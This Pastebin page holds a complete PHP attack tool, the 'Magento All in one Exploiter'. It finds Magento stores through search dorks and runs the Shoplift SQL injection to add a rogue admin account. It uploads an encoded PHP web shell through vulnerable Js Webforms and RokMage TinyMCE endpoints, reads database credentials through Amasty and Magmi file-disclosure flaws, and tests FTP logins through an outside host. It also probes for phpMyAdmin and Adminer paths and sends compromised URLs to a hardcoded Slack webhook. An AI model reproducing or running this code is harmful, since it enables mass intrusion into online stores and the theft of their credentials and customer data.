Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- function logo()
- {
- $logo = "=======================================================\n";
- $logo .= "Magento All in one Exploiter\n";
- $logo .= "Created By Pak Haxor Special Thank To Papah Crew\n";
- $logo .= "Thank To Yogyakarta BlackHat & All Coder Indonesian\n";
- $logo .= "=======================================================\n";
- echo $logo;
- }
- function CurlPost($url, $post = false,$type=null){
- if($type == 1)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- if($type == 2)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- if($post !== false){
- $isi = '';
- foreach($post as $key=>$value){
- $isi .= $key.'='.$value.'&';
- }
- rtrim($isi, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($isi));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- }
- function Jswebforms($site,$file)
- {
- $post = array('files[]'=>"@$file") ;
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$site/js/webforms/upload/");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- curl_close($ch);
- $json = json_decode($data);
- if(isset($json[0]->url))
- {
- $shell = get_content($json[0]->url);
- return (preg_match("/Pak Haxor/",$shell)) ? $json[0]->url : false;
- }
- }
- function ROGMAGE($site,$file)
- {
- $post = array('tuUploadFile'=>"@$file") ;
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$site/js/rokmage_tinymce/tinyupload.php");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- $url = parse_url($site);
- $target = (!isset($url["scheme"]) ? "http://".$site : $url["scheme"]."://".$url["host"]);
- $checkshell = get_content($target."/media/rt-tinymce-uploads/sj.php");
- return $checkshell;
- }
- function webhooksending($text)
- {
- $url = 'https://hooks.slack.com/services/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';
- $ch = curl_init($url);
- $jsonData = array(
- 'text' => $text
- );
- $jsonDataEncoded = json_encode($jsonData);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonDataEncoded);
- curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
- $result = @curl_exec($ch);
- return ($result == "ok") ? true : false ;
- }
- function createshell()
- {
- $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
- $shell = "PD9waHANCmVjaG8gYmFzZTY0X2RlY29kZSgiVUdGcklFaGhlRzl5Iik7DQplY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2lkeCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz4NCjwvZm9ybT4iOw0KaWYoJF9QT1NUWyd1cGxvYWQnXSkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2lkeCddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydpZHgnXVsnbmFtZSddKSkgew0KCWVjaG8gInN1a3NlcyI7DQoJfSBlbHNlIHsNCgllY2hvICJnYWdhbCI7DQoJfQ0KfQ0KPz4=";
- for($i=0;$i<count($ext);$i++)
- {
- $fp = fopen("sj.".$ext[$i], 'a+');
- fwrite($fp, base64_decode($shell));
- fclose($fp);
- }
- return $ext;
- }
- function get_content($url)
- {
- return @file_get_contents($url);
- }
- function FinderPhpMyAdmin($site)
- {
- $x = 1;
- $list = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- );
- if(isset($site))
- {
- echo "\n[+] Searching Phpmyadmin Login : ";
- foreach($list as $path => $test)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result))
- {
- return $site.$test;
- break;
- }
- else if (preg_match("/401 Unauthorized/", $result))
- {
- return $site.$test;
- }
- else
- {
- echo ".";
- }
- }
- }
- }
- function finderAdminer($site)
- {
- $list = array(
- '/adminer.php',
- '/adminer-4.2.6-dev.php',
- '/adminer-4.2.5.php',
- '/adminer-4.2.4.php',
- '/adminer-4.2.3.php',
- '/adminer-4.2.2.php',
- '/adminer-4.2.1.php',
- '/adminer-4.2.0.php',
- '/adminer-4.1.0.php',
- '/adminer-4.0.3.php',
- '/adminer-4.0.2.php',
- '/adminer-4.0.1.php',
- '/adminer-4.0.0.php',
- '/adminer-3.7.1.php',
- '/adminer-3.7.0.php',
- '/adminer-3.6.4.php',
- '/adminer-3.6.3.php',
- '/adminer-3.6.2.php',
- '/adminer-3.6.1.php',
- '/adminer-3.6.0.php',
- '/adminer-3.5.1.php',
- '/adminer-3.5.0.php',
- '/adminer-3.4.0.php',
- '/adminer-3.3.4.php',
- '/adminer-3.3.3.php',
- '/adminer-3.3.2.php',
- '/adminer-3.3.1.php',
- '/adminer-3.3.0.php',
- '/adminer-3.2.2.php',
- '/adminer-3.2.1.php',
- '/adminer-3.2.0.php',
- '/adminer-3.1.0.php',
- '/adminer-3.0.1.php',
- '/adminer-3.0.0.php',
- '/adminer-2.3.2.php',
- '/adminer-2.3.1.php',
- '/adminer-2.3.0.php',
- '/adminer-2.2.1.php',
- '/adminer-2.2.0.php',
- '/adminer-2.1.0.php',
- '/adminer-2.0.0.php',
- '/adminer-1.11.1.php',
- '/adminer-1.11.0.php');
- if(isset($site))
- {
- echo "\n[+] Searching Adminer Login : ";
- foreach($list as $path => $test)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result))
- {
- return $site.$test;
- break;
- }
- else if (preg_match("/401 Unauthorized/", $result))
- {
- return $site.$test;
- }
- else
- {
- echo ".";
- }
- }
- }
- }
- function ftplogin($host,$user,$pass)
- {
- $con = ftp_connect($host) or die("Couldn't connect");
- ftp_login($con, $user, $pass);
- return is_array(ftp_nlist($con, ".")) ? true : false;
- }
- function GetStr($start,$end,$string){
- $a = explode($start,$string);
- $b = explode($end,$a[1]);
- return $b[0];
- }
- function userFTP($username)
- {
- $user = explode("_",$username);
- return (isset($user[1])) ? $user[1] : $user[0];
- }
- function ReadStdin($prompt, $valid_inputs=null, $default = '') {
- while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
- echo $prompt;
- $input = strtolower(trim(fgets(STDIN)));
- break;
- if(empty($input) && !empty($default)) {
- $input = $default;
- }
- }
- return $input;
- }
- function NameXFile($file)
- {
- $validation = explode('.',$file);
- $ext = array("txt","log","lst");
- for($x=0;$x<count($ext);$x++)
- {
- if($validation[1] == $ext[$x++])
- {
- return true;
- }
- }
- }
- function LoginDownloader($url){
- $link = parse_url($url);
- if(isset($link["scheme"]))
- {
- $data = CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
- array("username" => "pak",
- "password" => "haxor123"),2
- );
- }
- else
- {
- $data = CurlPost("http://$url/downloader",
- array("username" => "pak",
- "password" => "haxor123"),2
- );
- }
- if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
- $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
- $smtp = (preg_match("/Smtp/",$data) ? "Yes" : "No");
- $filemanager = (preg_match("/File_System/",$data) ? "Yes":"No");
- return $permission.
- "\n ==> Smtp : $smtp".
- "\n ==> Filemanager : $filemanager";
- } else {
- return "Failed";
- }
- }
- function getDomain($keyword)
- {
- if($keyword == 1)
- {
- return array($argv[1]);
- }
- }
- function filterDomain($domains)
- {
- $url = parse_url($domains);
- $target = (!isset($url["scheme"]) ? "http://".$domains : $url["scheme"]."://".$url["host"]);
- if(preg_match('/http/',$target))
- {
- $reparse = parse_url($target);
- $domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
- if (!filter_var("http://$domain", FILTER_VALIDATE_URL) === false)
- {
- if($domain !== "")
- {
- $checkdomain = explode('.',$domain);
- if(isset($checkdomain[1]))
- {
- echo $domain;
- return $domain;
- }
- }
- }
- }
- }
- /*DEMO function checkstatusMysqlLogin($host,$user,$pass,$domain = null,$stop = true)
- {
- $mysql = @mysqli_connect($host,$user,$pass);
- $sql = array($host,$user,$pass);
- if(!$mysql)
- {
- if($stop == true)
- {
- return false;
- }
- $recheck = checkstatusMysqlLogin($domain,$user,$pass);
- if(!$recheck)
- {
- $domain = str_replace("www.", "", $domain);
- checkstatusMysqlLogin("mysql.".$domain,$user,$pass,null,true);
- }
- else
- {
- return $sql;
- }
- }
- return $sql;
- }*/
- function wrongpress($read,$angka)
- {
- if(!isset($read) or $read > $angka or !(int)($read) or $read = "")
- {
- echo "Wrong Press !!!";
- die();
- }
- }
- function SearchEngine($dork,$angka)
- {
- $list = array();
- if($angka == 1)
- {
- for($i=0;$i<=1000;$i+=10){
- $search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = filterDomain($link);
- $list[] = $domain;
- }
- }
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 2)
- {
- $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
- for($x=0;$x<=count($ccbing)-1;$x++){
- for($i=0;$i<=1000;$i+=10){
- $search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE",false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = filterDomain($link);
- $fp = fopen("domain.txt", 'a+');
- fwrite($fp, $domain."\n");
- fclose($fp);
- $list[] = $domain;
- }
- }
- }
- echo ".";
- }
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 3)
- {
- for($x=1;$x<=1000;$x+=10){
- $check = CurlPost('http://www.dogpile.com/dogpilecontrol/search/web?qsi='.$x.'&q='.$dork.'&fcoid=4&fcop=results-bottom&fpid=2',false,2);
- preg_match_all('# target="_blank">(.*?)</a>#',$check,$matches);
- foreach($matches[1] as $domain)
- {
- $domain = str_replace("<strong>", "", $domain);
- $domain = str_replace("</strong>", "", $domain);
- $list[] = filterDomain($domain);
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- }
- logo();
- $getdomains = ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
- wrongpress($getdomains,3);
- if($getdomains == 1)
- {
- $dorker = ReadStdin("[1] Bing\n[2] Bing By Country\n[3] Dogpile\nSelected : ",array("keyword"));
- if(isset($dorker))
- {
- wrongpress($dorker,3);
- $url1 = ReadStdin("Masukkan Dork : ",array("keyword"));
- echo "Grabbing : ";
- $get = SearchEngine($url1,$dorker);
- }
- }
- if($getdomains == 2)
- {
- $url2 = ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
- $get =(NameXFile($url2) == true) ? file($url2) : die("Masukkan Nama File Dengan Benar !!!");
- }
- if($getdomains == 3)
- {
- $url3 = ReadStdin("Masukkan url : ",array("keyword"));
- $get = array($url3);
- }
- $addadmin = ReadStdin('Apakah Anda Ingin Menggunakan Shoplift(Magento Add Admin) ? (Y/N): ', array('Y', 'N'));
- $jswebforms = ReadStdin('Apakah Anda Ingin Menggunakan Magento Js Webforms ? (Y/N): ', array('Y', 'N'));
- $lfdScanning = ReadStdin('Apakah Anda Ingin Menggunakan LFD Scanning + magmi + amasty ? (Y/N): ', array('Y', 'N'));
- $rogmage_tinymce = ReadStdin('Apakah Anda Ingin Menggunakan TinyMCE ROGMAGE ? (Y/N): ', array('Y', 'N'));
- $ftpScanning = ReadStdin('Apakah Anda Ingin Menggunakan FTP Scanning(BETA) ? (Y/N): ', array('Y', 'N'));
- $scanningMysqlLogin = ReadStdin('Apakah Anda Ingin Menggunakan mysql finder ? (Y/N): ', array('Y', 'N'));
- //==================GET FROM FILEDATA====================//
- $x=1;
- foreach($get as $domain)
- {
- if($getdomains == 2)
- {
- $domain = str_replace("\r", "", $domain);
- $domain = str_replace("\n", "", $domain);
- }
- echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
- echo "Scanning Url : $domain\n";
- if($addadmin == "y")
- {
- echo "[+] Add Admin Status : ";
- $path = "/admin/Cms_Wysiwyg/directive/index/";
- $post = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoYXhvcjEyMycpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3BhaycsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3BhaycpLCdGaXJzdG5hbWUnKTs=%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
- $exploit = CurlPost($domain.$path,$post,1);
- if(preg_match('#200 OK#', $exploit))
- {
- echo "SUCCESS";
- echo "\n[+] Check Status Login :";
- $postlogin = array("login[username]" => "pak",
- "login[password]" => "haxor123");
- $postlogindownloader = array("username" => "pak",
- "password" => "haxor123");
- $checklogin = CurlPost($domain."/admin",$postlogin,2);
- $downloader = LoginDownloader($domain);
- if(preg_match('/<body id="html-body" class=" adminhtml-dashboard-index">/', $checklogin))
- {
- $total = GetStr("<span class=\"price\">","</span>",$checklogin);
- $average = GetStr('<span class="nowrap" style="font-size:18px;"><span class="price">',"</span>",$checklogin);
- echo "TRUE\n";
- $message = "====================================\n";
- $message .= " ==> Url Login : $domain/admin\n";
- $message .= " ==> Username : pak\n";
- $message .= " ==> Password : haxor123\n";
- $message .= " ==> Lifetime Sales : $total \n";
- $message .= " ==> Average Orders : $average \n";
- $message .= " ==> Downloader : $downloader \n";
- echo $message;
- $fp = fopen("shoplift.txt", 'a+');
- fwrite($fp, $message);
- fclose($fp);
- }
- else
- {
- echo "FALSE\n";
- }
- echo "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++";
- }
- else
- {
- echo "FAILURE\n";
- }
- }
- if($jswebforms == "y")
- {
- if(CurlPost($domain."/js/webforms/upload",false,2) == "[]" or CurlPost($domain."/js/webforms/upload",false,2) == "null")
- {
- echo "[+] Uploaded Shell : ";
- if(!file_exists("sj.php"))
- {
- $ext = createshell();
- }
- else
- {
- $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
- }
- for($i=0;$i<count($ext);$i++)
- {
- echo ".";
- $exploit = Jswebforms($domain,"sj.".$ext[$i]);
- if(isset($exploit))
- {
- echo "\n".$exploit." Success \n";
- $fp = fopen("jswebforms.txt", 'a+');
- webhooksending($exploit."\n");
- fwrite($fp, $exploit."\n");
- fclose($fp);
- break;
- }
- }
- }
- else
- {
- echo "[-] Webforms Not vuln\n";
- }
- }
- if($rogmage_tinymce == "y")
- {
- $checkVuln = CurlPost($domain."/js/rokmage_tinymce/tinyupload.php",false,2);
- echo "[+] Tiny MCE Scanning :";
- if(preg_match('/rt-tinymce-uploads/',$checkVuln))
- {
- echo "VULN\n";
- echo "Uploading Shell :";
- $rogmage = ROGMAGE($domain,"sj.php");
- if(preg_match('/Pak Haxor/',$rogmage))
- {
- echo " $domain/media/rt-tinymce-uploads/sj.php\n";
- $fp = fopen("rogmage.txt", 'a+');
- fwrite($fp, "$domain/media/rt-tinymce-uploads/sj.php\n");
- fclose($fp);
- }
- else
- {
- echo " Shell Not FOUND\n";
- }
- }
- else
- {
- echo "FAILED\n";
- }
- }
- if($lfdScanning == "y")
- {
- $path = array("Amasty" => "/app/etc/local.xml",
- "Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml"
- );
- echo " [+] LFD Scanning :";
- foreach($path as $key => $value)
- {
- $url = parse_url($domain);
- $target = (!isset($url["scheme"]) ? "http://".$domain : $url["scheme"]."://".$url["host"]);
- $lfd = get_content($target.$value);
- if(preg_match("/<host><!/",$lfd))
- {
- echo "Found\n";
- $date = GetStr("<date><![CDATA[","]]></date>",$lfd);
- $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
- $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
- $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
- $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
- $lfdconfig = "\n==============[Mysql Login]===============";
- $lfdconfig .= "\nDomain : $domain";
- $lfdconfig .= "\nDate : $date";
- $lfdconfig .= "\nHost : $host";
- $lfdconfig .= "\nUsername : $username";
- $lfdconfig .= "\nPassword : $password";
- $lfdconfig .= "\nDatabaseName : $dbname";
- $lfdconfig .= "\n=========================================";
- echo $lfdconfig;
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, $lfdconfig);
- fclose($fp);
- if($ftpScanning == "y")
- {
- echo "\n[+] Scanning FTP LOGIN : ";
- $url = parse_url($domain);
- $ftp = get_content("http://www.fccarolinasoccer.com/ftp.php?domain=$domain&username=".userFTP($username)."&password=$password");
- if(preg_match("/SUCCESS/",$ftp))
- {
- echo "SUCCESS\n";
- $ftpinfo = "================================\n";
- $ftpinfo .= "Host : ftp.".$url["host"]."\n";
- $ftpinfo .= "Username : ".userFTP($username)."\n";
- $ftpinfo .= "Password : ".$password."\n";
- $ftpinfo .= "================================\n";
- echo $ftpinfo;
- $fp = fopen("ftpmagento.txt", 'a+');
- fwrite($fp, $ftpinfo);
- fclose($fp);
- }
- else
- {
- echo "Failure\n";
- }
- }
- if($scanningMysqlLogin == "y")
- {
- $finderPhpmyadmin = FinderPhpMyAdmin("$domain");
- if(isset($finderPhpmyadmin))
- {
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, "\nPath Mysql login : $finderPhpmyadmin");
- fclose($fp);
- echo "\n Path Mysql login : $finderPhpmyadmin";
- }
- elseif(!$finderPhpmyadmin)
- {
- $adminer = finderAdminer("$domain");
- if(isset($adminer))
- {
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, "\nPath Mysql login : $adminer ");
- fclose($fp);
- echo "\n Path Mysql login : $adminer ";
- }
- else
- {
- /*DEMO{
- echo "\n[+] Manual MYSQL CHECKED :";
- $manualMYSQL = checkstatusMysqlLogin($host,$username,$password,"$domain");
- if($manualMYSQL !== false)
- {
- echo "SUCCESS\n";
- webhooksending("CAN LOGIN MANUAL == >
- HOST :".$manualMYSQL[0]
- ."USER :".$manualMYSQL[1]
- ."Passowrd :".$manualMYSQL[2]."\n");
- }
- else
- {*/
- echo "\nFAILED";
- /*DEMO }*/
- }
- }
- }
- break;
- }
- else
- {
- echo " \n==>[$key] Not Found";
- }
- }
- }
- }
- ?>
Add Comment
Please, Sign In to add comment